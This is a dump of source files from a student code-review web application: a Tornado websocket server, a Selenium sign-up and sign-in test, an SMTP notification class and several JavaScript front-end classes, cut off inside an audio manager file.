in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\tdef delete_assignment(self, id):\n\t\tmessage = assignments_manager.delete_assignment(id)\n\t\tself.send_message(message[0], {})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\tdef get_assignments(self):\n\t\tmessage = assignments_manager.get_assignments()\n\t\tself.send_message(message[0], message[1])\n\n\n\tdef submit_assignment(self, message_data):\n\t\tmessage = assignments_manager.submit_assignment(message_data)\n\t\tself.send_message(message[0], {})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\n\tdef get_submissions(self, user_id):\n\t\tmessage = assignments_manager.get_submissions(user_id)\n\t\tself.send_message(message[0], message[1])\n\n\tdef get_all_submissions(self):\n\t\tmessage = assignments_manager.get_all_submissions()\n\t\tself.send_message(message[0], message[1])\n\n\tdef submit_review(self, message_data):\n\t\tmessage = assignments_manager.submit_review(message_data)\n\t\tself.send_message(message[0], {})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\tdef push_standard(self, message_data):\n\t\tmessage = assignments_manager.push_standard(message_data)\n\t\tself.send_message(message[0], message[1])\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_standard()\n\n\n\tdef get_standard(self):\n\t\tmessage = assignments_manager.get_standard()\n\t\tself.send_message(message[0], message[1])\n\n\tdef on_close(self):\n\t\tprint (\"WebSocket 
closed\")\n\t\t#Remove connection\n\t\tkey = \"\"\n\t\ttry:\n\t\t\tfor k, item in connections.items():\n\t\t\t\tif item[\"socket\"] == self:\n\t\t\t\t\tkey = k\n\t\t\tconnections.pop(key)\n\t\texcept:\n\t\t\tprint(\"Key Error\")\n\t\tprint(\"Total Connections: \", len(connections))\n\n\n\n\tdef send_message(self,type,data):\n\t\tprint(\"send_message\")\n\t\tmsg=dict()\n\t\tmsg[\"type\"]=type\n\t\tmsg[\"data\"]=data\n\t\tmsg=json.dumps(msg)\n\t\tself.write_message(msg)\n\n\nuser_manager = UserManager()\nassignments_manager = AssignmentsManager()\n\nsettings = {\n\t'debug':True\t#includes autoreload\n}\n\napp= tornado.web.Application([\n\t#map the handler to the URI named \"wstest\"\n\t(r'/GCodeReviewer', WSHandler),\n], settings)\n\nif __name__ == '__main__':\n\tserver_port = 443 #replace with 8080 when putting on gamecore\n\tprint(\"server ON\")\n\tapp.listen(server_port)\n\tioloop = tornado.ioloop.IOLoop.instance()\n\n\t# runs a periodic update method to handle time based features.\n\t# go to daemon_update file to add/change the logic\n\t# set it to run 300000 for one run each 5 min or so.\n\tPeriodicCallback(globalDaemonMethod, 15000).start()\n\n\n\n\n\n\n\n\tautoreload.start(ioloop)\n\tioloop.start()\n"
},
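Every message the server above exchanges is JSON with "type" and "data" keys over the /GCodeReviewer endpoint; a minimal tornado client sketch (assumed, not part of the repo) that requests the assignment list:

```python
import json
from tornado import ioloop
from tornado.websocket import websocket_connect

async def main():
    # endpoint path and port 443 taken from server.py above (plain ws, no TLS)
    conn = await websocket_connect("ws://localhost:443/GCodeReviewer")
    conn.write_message(json.dumps({"type": "get_assignments", "data": {}}))
    print(await conn.read_message())

ioloop.IOLoop.current().run_sync(main)
```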
{
"alpha_fraction": 0.6580086350440979,
"alphanum_fraction": 0.6634768843650818,
"avg_line_length": 35.57500076293945,
"blob_id": "5e0a61602b40d1fc0126023e5776f38fd40ee345",
"content_id": "e71b658bbb8b3afb3e4b73c8f8ea320aab506e9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4389,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 120,
"path": "/tests/testbot.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import time\nimport unittest\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\nclass TestBot(unittest.TestCase):\n \"\"\"Test bot to run through all of the features\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n cls.name = \"Libor\"\n cls.surname = \"Zachoval\"\n cls.role = \"Admin\"\n cls.email = \"[email protected]\"\n cls.password = \"password\"\n\n cls.driver = webdriver.Chrome()\n cls.driver.get(\"http://localhost/ProjectOrganiser/\")\n cls.driver.maximize_window()\n\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n cls.driver.quit()\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n def test_a_signup(self):\n print(\"test_signup\")\n driver = self.driver\n\n SIGNIN_BOX_ID = \"signin-box\"\n SIGNUP_BOX_ID = \"signup-box\"\n SIGNUP_LINK_ID = \"signup-link\"\n\n SIGNUP_NAME_ID = \"signup-name\"\n SIGNUP_SURNAME_ID = \"signup-surname\"\n SIGNUP_ROLE_ID = \"signup-role\"\n SIGNUP_EMAIL_ID = \"signup-email\"\n SIGNUP_PASSWORD_ID = \"signup-password\"\n SIGNUP_BUTTON_ID = \"signup-button\"\n\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNIN_BOX_ID))\n self.assertEqual(SIGNIN_BOX_ID, boxElement.get_attribute(\"class\"))\n\n driver.find_element_by_id(SIGNUP_LINK_ID).click()\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNUP_BOX_ID))\n self.assertEqual(SIGNUP_BOX_ID, boxElement.get_attribute(\"class\"))\n\n\n signupNameElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_NAME_ID))\n signupSurnameElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_SURNAME_ID))\n #find_element_by_xpath(\"//select[@id='\" + SIGNUP_ROLE_ID + \"']/option[text()='\"self.role\"']\").click()\n signupRoleElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_ROLE_ID))\n signupEmailElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_EMAIL_ID))\n signupPasswordElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_PASSWORD_ID))\n\n signupNameElement.send_keys(self.name)\n signupSurnameElement.send_keys(self.surname)\n signupRoleElement.send_keys(self.role)\n signupEmailElement.send_keys(self.email)\n signupPasswordElement.send_keys(self.password)\n\n driver.find_element_by_id(SIGNUP_BUTTON_ID).click()\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNIN_BOX_ID))\n self.assertEqual(SIGNIN_BOX_ID, boxElement.get_attribute(\"class\"))\n\n\n def test_b_signin(self):\n print(\"test_signin\")\n driver = self.driver\n\n SIGNIN_BOX_ID = \"signin-box\"\n MARK_LAB_ID = \"marklab\"\n SIGNIN_EMAIL_ID = \"signin-email\"\n SIGNIN_PASSWORD_ID = \"signin-password\"\n SIGNIN_BUTTON_ID = \"signin-button\"\n\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNIN_BOX_ID))\n self.assertEqual(SIGNIN_BOX_ID, boxElement.get_attribute(\"class\"))\n\n\n signinEmailElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNIN_EMAIL_ID))\n 
signinPasswordElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNIN_PASSWORD_ID))\n\n signinEmailElement.clear()\n signinPasswordElement.clear()\n\n signinEmailElement.send_keys(self.email)\n signinPasswordElement.send_keys(self.password)\n\n driver.find_element_by_id(SIGNIN_BUTTON_ID).click()\n\n #Needs to be updated once marklab changes\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(MARK_LAB_ID))\n self.assertEqual(MARK_LAB_ID, boxElement.get_attribute(\"id\"))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
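The WebDriverWait(...).until(lambda ...) calls above can equivalently use selenium's expected_conditions helpers; a sketch of the same wait (URL and element id taken from the test class):

```python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

driver = webdriver.Chrome()
driver.get("http://localhost/ProjectOrganiser/")  # URL from setUpClass above
element = WebDriverWait(driver, 10).until(
    EC.presence_of_element_located((By.ID, "signin-email"))
)
```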
{
"alpha_fraction": 0.6871914863586426,
"alphanum_fraction": 0.6890101432800293,
"avg_line_length": 34.155250549316406,
"blob_id": "fe9b954c5be5bad8dbcb6ec44c44b8e7fdf53910",
"content_id": "c6ef5160b433e9be6ea6937ab2d500a1a1c891bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7698,
"license_type": "no_license",
"max_line_length": 239,
"num_lines": 219,
"path": "/py/email_system.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom email.message import EmailMessage\n\n\n\nclass EmailSystem:\n\tSYSTEM_LINK = \"http://gamecore.itcarlow.ie/CodeReviewer2/\"\n\n\n\n\tdef __init__(self):\n\t\tprint(\"EmailSystem: __init__\")\n\t\tself.email_server = 'akmac.itcarlow.ie'\n\t\tself.EMAIL_ADDRESS = '[email protected]'\n\n\n\t\tself.letter_near_deadline = \"Hello {0}.<br><br> The deadline for the {1} is at {2} {3}. Please submit your work. \" \\\n\t\t\t\t\t\t\t\t\t\"<br><br>Have a good day<br>Spaceship Assembly Message System\"\n\n\n\n\t\tself.letter_review = \"Hi there {0}.<br><br>\" \\\n\t\t\t\t\t\t\t \"The deadline was successfully completed. Visit the \\\"Reviews To Do\\\" tab and see the submissions you need to review for this assignment. Periodically check the \\\"Feedbacks\\\" tab to see work reviewed.<br><br>\" \\\n\t\t\t\t\t\t\t \"If you want to resubmit work, you can do it in your \\\"Assignments\\\" tab, but there is a limit up to which time you can do it - once it reached you cannot do any reviews.<br><br>\" \\\n\t\t\t\t\t\t\t \"Good luck<br>Spaceship Assembly Message System\"\n\n\n\n\t\tself.letter_re_submission = \"Greetings {0}.<br><br> One of the users whose work you reviewed has submitted a new version of the submission - go take a look at it and fix it if needed.<br><br> Regards<br>Spaceship Assembly Message System\"\n\n\t\tself.letter_near_review_deadline = \"Hello {0}.<br><br> The deadline for reviewing is coming. Please complete your reviews if you haven't yet<br><br>Good luck<br>Spaceship Assembly Message System\"\n\n\t\tself.letter_welcome = \t\"Welcome, {0}. You were invited into the Spaceship Assembly Sector as a programmer! Here is the ticket to our place: <a href='{1}'>Ticket</a><br><br>Regards<br>Spaceship Assembly Message System\"\n\n\n\n\n\n\n\tdef send_welcome_emails(self, org, students):\n\t\trepo_url_part = \"https://github.com/\" + org + \"/\"\n\t\tfor student in students:\n\t\t\tmsg = MIMEMultipart()\n\t\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\t\tmsg['To'] = student[\"email\"]\n\t\t\tmsg['Subject'] = \"Welcome to the system\"\n\t\t\tfull_repo_path = repo_url_part + student[\"team_repo\"] + \"/\"\n\n\t\t\tcontent = \tself.letter_welcome.format(student[\"full_name\"], full_repo_path)\n\t\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\t\ttry:\n\t\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\t\ts.quit()\n\t\t\texcept IOError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: Unable to send to \" + student[\"email\"])\n\t\t\texcept smtplib.SMTPConnectError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: smtp exception \" + student[\"email\"])\n\n\n\tdef send_new_deadline_emails(self, students, deadline):\n\t\tfor student in students:\n\t\t\tmsg = MIMEMultipart()\n\t\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\t\tmsg['To'] = student[\"email\"]\n\t\t\tmsg['Subject'] = \"There is a new deadline!\"\n\t\t\tdeadline_datetime = deadline[\"datetime\"].split(\"T\")\n\n\t\t\tcontent = \tself.letter_new_deadline.format(deadline[\"name\"], deadline_datetime[0], deadline_datetime[1], self.CODE_REVIEW_URL, student[\"full_name\"])\n\t\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\t\ttry:\n\t\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\t\ts.quit()\n\t\t\texcept IOError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' 
email: Unable to send to \" + student[\"email\"])\n\t\t\texcept smtplib.SMTPConnectError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\n\tdef send_near_deadline_emails(self, students, deadline):\n\t\tdatetime = deadline[\"date_time\"].split(\"T\")\n\t\tfor student in students:\n\t\t\tmsg = MIMEMultipart()\n\t\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\t\tmsg['To'] = student[\"email\"]\n\t\t\tmsg['Subject'] = deadline[\"name\"] + \"'s deadline is within an hour!\"\n\n\t\t\tcontent = \tself.letter_near_deadline.format(student[\"full_name\"], deadline[\"name\"], datetime[0], datetime[1])\n\t\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\t\ttry:\n\t\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\t\ts.quit()\n\t\t\texcept IOError:\n\t\t\t\tprint(\"Error sending 'send_near_deadline_emails' email: Unable to send to \" + student[\"email\"])\n\t\t\texcept smtplib.SMTPConnectError:\n\t\t\t\tprint(\"Error sending 'send_near_deadline_emails' email: smtp exception \" + student[\"email\"])\n\n\n\tdef send_submission_message(self, student):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"You successfully submitted your work.\"\n\t\tcontent = self.letter_submission.format(student[\"full_name\"])\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\tdef send_review_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Deadline is completed!\"\n\n\t\tcontent = \tself.letter_review.format(student[\"full_name\"],pull_url,self.CODE_REVIEW_URL, self.CPP_STANDARDS)\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\tdef send_review_passed_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Your Pull Request is good to merge!\"\n\t\tcontent = \tself.letter_passed.format(student[\"full_name\"], pull_url)\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\n\n\n\tdef send_review_redo_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = 
student[\"email\"]\n\t\tmsg['Subject'] = \"Your Repo was reviewed. Solve issues.\"\n\t\tcontent = self.letter_redo.format( student[\"full_name\"], pull_url)\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\tdef send_review_corrected_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Pull Request you reviewed was corrected\"\n\n\t\tcontent = self.letter_corrected.format(pull_url, student[\"full_name\"])\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\tdef __del__(self, *err):\n\t\tprint (\"EmailSystem:__del__\")"
},
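All the send_* methods above share one shape: build a MIMEMultipart with an HTML part and hand it to smtplib. Reduced to a sketch (addresses are placeholders; the server name is copied from the class):

```python
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart()
msg['From'] = '[email protected]'  # placeholder
msg['To'] = '[email protected]'       # placeholder
msg['Subject'] = 'Test'
msg.attach(MIMEText('Hello <b>there</b>', 'html'))

s = smtplib.SMTP('akmac.itcarlow.ie')     # server taken from EmailSystem
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
```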
{
"alpha_fraction": 0.6577181220054626,
"alphanum_fraction": 0.6577181220054626,
"avg_line_length": 10.037036895751953,
"blob_id": "ed6fa3cd651950a0f207bda51cf08da2e235fba7",
"content_id": "0b7a8778a19fbe72d9c1473931fcdd7357103a7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 27,
"path": "/views/profile/ProfileView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass ProfileView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.PROFILE;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\n\t}\n\n\n\tshow()\n\t{\n\n\n\n\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.5904762148857117,
"alphanum_fraction": 0.5904762148857117,
"avg_line_length": 20,
"blob_id": "b164c9a6135d1991c612d428654edeb7e7c5a2b2",
"content_id": "256265bef84a60fbd040cc86e27c0acd49e8740c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 10,
"path": "/js/Standard.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Standard\n{\n constructor(data)\n {\n this.id = data.id;\n this.category = data.category;\n this.subCategory = data.sub_category;\n this.description = data.description;\n }\n}\n"
},
{
"alpha_fraction": 0.5583333373069763,
"alphanum_fraction": 0.7416666746139526,
"avg_line_length": 16.285715103149414,
"blob_id": "111d2101a41aa469445502f1f543da220daa0f62",
"content_id": "c47cd6de90d41f99760807c793ddfa00d1fba7b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 7,
"path": "/Docker/requirements.txt",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "tornado==4.4.2\nrequests==2.18.4\nmysql-connector==2.1.6\nselenium==3.7.0\nunittest2py3k==0.5.1\npytest==3.2.5\nbeautifulsoup4"
},
{
"alpha_fraction": 0.5801470875740051,
"alphanum_fraction": 0.583088219165802,
"avg_line_length": 25.153846740722656,
"blob_id": "9f1c4ccb500f54e336f831f521c16ebac446f87a",
"content_id": "ca9dabc5225556d8884094ceb375790c80ef0804",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1360,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 52,
"path": "/js/Listened.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Listened\n{\n constructor()\n {\n\n }\n setUpListening()\n {\n //list of children of the body\n var docBodyChildren = document.getElementsByTagName(\"body\")[0].children;\n console.log(docBodyChildren);\n\n this.recursiveCheck(docBodyChildren);\n\n }\n\n recursiveCheck(docBodyIn)\n {\n //for every element in the body\n for (var i=0; i<docBodyIn.length; i++)\n {\n //if it has at least 1 child\n if(docBodyIn[i].children.length > 0)\n {\n //recursively pass in that child to this method\n //check if it has children\n this.recursiveCheck(docBodyIn[i].children);\n //console.log(\"going to child of\", docBodyIn[i].id);\n }\n else\n {\n try\n {\n //if the element has no children try add an addEventListener to it which will only work if it has an id which is what we want\n // elementsToTrack.push(docBodyIn[i].id);\n if(docBodyIn[i].id !== null)\n {\n document.getElementById(docBodyIn[i].id).addEventListener(\"click\", function(){track(this.id)} );\n console.log(\"adding tracker to \", docBodyIn[i].id);\n }\n }\n catch (e)\n {\n //if it doesnt have an id it doesnt need to be tracked\n //console.log(\"element doesnt have an id so doesnt need to be tracked\");\n }\n }\n }\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.49871334433555603,
"alphanum_fraction": 0.49871334433555603,
"avg_line_length": 22.987653732299805,
"blob_id": "e9864dc28f0c8e3424bf9902acee5ed6a394edba",
"content_id": "4a390bae1e9b549d830d2616fa7a9a6de2823ec7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1943,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 81,
"path": "/js/User.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Model of User info sends information to the server and updates\n* the view depending on what is returned (e.g. signs in or error)**/\nclass User extends Model\n{\n constructor()\n {\n super();\n this.email = \"\";\n this.name = \"\";\n this.surname = \"\";\n this.noun = \"\";\n this.role = \"\";\n this.id = \"\";\n this.log = \"\";\n }\n\n\n update(data, messageType)\n {\n if (data !== \"\" && !Number.isInteger(data))\n {\n if (messageType === net.messageHandler.types.SIGN_IN_SUCCESSFUL ||\n messageType === net.messageHandler.types.SIGN_UP_SUCCESSFUL)\n {\n this.setData(data);\n\n app.assignments.getAllAssignment();\n app.standards.getStandards();\n\n if (data.role === \"student\")\n {\n app.submissions.getPersonalSubmissions(data.id);\n }\n else\n {\n app.submissions.getAllSubmissions();\n }\n\n }\n }\n\n this.notify(messageType);\n }\n\n\n signup(email, teamName, name, surname, noun, password)\n {\n var userData = {};\n\n userData.email = email;\n userData.team_name = teamName;\n userData.name = name;\n userData.surname = surname;\n userData.noun = noun;\n userData.password = password;\n userData.role = \"student\";\n\n net.sendMessage(\"signup\", userData);\n }\n\n signin(email, password)\n {\n var userData = {};\n userData.email = email;\n userData.password = password;\n\n net.sendMessage(\"signin\", userData);\n }\n\n setData(data)\n {\n this.email = data.email;\n this.name = data.name;\n this.surname = data.surname;\n this.noun = data.noun;\n this.role = data.role;\n this.id = data.id;\n this.log = data.log;\n\n }\n}\n"
},
{
"alpha_fraction": 0.7308642268180847,
"alphanum_fraction": 0.7308642268180847,
"avg_line_length": 27.928571701049805,
"blob_id": "69b19370c0525da39e8affe302f82289d529c2ee",
"content_id": "7286326942e6acaa86cfc1ef0660ac85aa093c53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1620,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 56,
"path": "/js/MessageHandler.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Handles messages**/\nclass MessageHandler\n{\n\tconstructor ()\n\t{\n\t\tthis.types = {\n\t\t\tUPDATE_TABLE: \"update_table\",\n\t\t\tUPDATE_FAILED: \"update_failed\",\n\n\t\t\tSIGN_IN_SUCCESSFUL: \"signin_successful\",\n\t\t\tSIGN_IN_FAILED: \"signin_failed\",\n\n\t\t\tSIGN_UP_SUCCESSFUL: \"signup_successful\",\n\t\t\tSIGN_UP_FAILED: \"signup_failed\",\n\n\t\t\tTEACHER_ASSIGNMENTS_CREATION_SUCCESSFUL: \"teacher_assignments_creation_successful\",\n\t\t\tTEACHER_ASSIGNMENTS_CREATION_FAILED: \"teacher_assignments_creation_failed\",\n\n\t\t\tGET_ASSIGNMENTS_SUCCESSFUL: \"get_assignments_successful\",\n\t\t\tGET_ASSIGNMENTS_FAILED: \"get_assignments_failed\",\n\n\t\t\tASSIGNMENT_DELETE_SUCCESSFUL: \"assignment_delete_successful\",\n\t\t\tASSIGNMENT_DELETE_FAILED: \"assignment_delete_failed\",\n\n\t\t\tSUBMIT_ASSIGNMENT_SUCCESSFUL: \"submit_assignment_successful\",\n\t\t\tSUBMIT_ASSIGNMENT_FAILED: \"submit_assignment_failed\",\n\n\t\t\tGET_SUBMISSIONS_SUCCESSFUL: \"get_submissions_successful\",\n\t\t\tGET_SUBMISSIONS_FAILED: \"get_submissions_failed\",\n\n\t\t\tSUBMIT_REVIEW_SUCCESSFUL:\"submit_review_successful\",\n\t\t\tSUBMIT_REVIEW_FAILED:\"submit_review_failed\",\n\n\t\t\tPUSH_STANDARD_SUCCESSFUL:\"push_standard_successful\",\n\t\t\tPUSH_STANDARD_FAILED:\"push_standard_failed\",\n\n\t\t\tGET_STANDARD_SUCCESSFUL:\"get_standard_successful\",\n\t\t\tGET_STANDARD_FAILED:\"get_standard_failed\"\n\t\t};\n\t}\n\n\thandleMessage (message)\n\t{\n\t\tconsole.log(\"in messagehandler\");\n\t\tvar msg = JSON.parse(message);\n\t\tvar type = msg.type;\n\t\tvar data = msg.data;\n\n\t\tconsole.log(\"Message received:\", type,\"-\", data);\n\n\t\tapp.user.update(data, type);\n\t\tapp.assignments.update(data, type);\n\t\tapp.submissions.update(data, type);\n\t\tapp.standards.update(data, type);\n\t}\n}\n"
},
{
"alpha_fraction": 0.654539942741394,
"alphanum_fraction": 0.6571168899536133,
"avg_line_length": 28.4375,
"blob_id": "f2d6e82998e4b69d01e3f07f751c8a78805101ae",
"content_id": "ecec9caab2a2e88074e35c6ad077c0864cd82517",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6597,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 224,
"path": "/js/AudioManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "function AudioManager()\n{\n\tthis.audioContext={};\n\tthis.audioBuffers=[];\n\n this.resourcePath = \"resources/audio/\";\n\n\tthis.downloadQueue=[];\n\tthis.cache={};\n\tthis.successCount = 0;\n this.errorCount = 0;\n\n // Sounds that are currently playing\n this.playingSounds={};\n\n\ttry {\n \t// Fix up for prefixing (don't have to write \"webkit\" all the time)\n \twindow.AudioContext = window.AudioContext||window.webkitAudioContext;\n \tthis.audioContext = new AudioContext();\n \t}\n catch(e) {\n alert('Web Audio API is not supported in this browser');\n }\n\n}\n\n/**\n * Load the sound file.\n * @param filename - name to refer to sound.\n * @param downloadCallback - function to call.\n */\nAudioManager.prototype.loadSoundFile = function (filename, downloadCallback) {\n\tvar that = this;\n\tvar url = this.resourcePath+filename;\n\t\n\tvar xhr = new XMLHttpRequest();\n\txhr.open('GET', url, 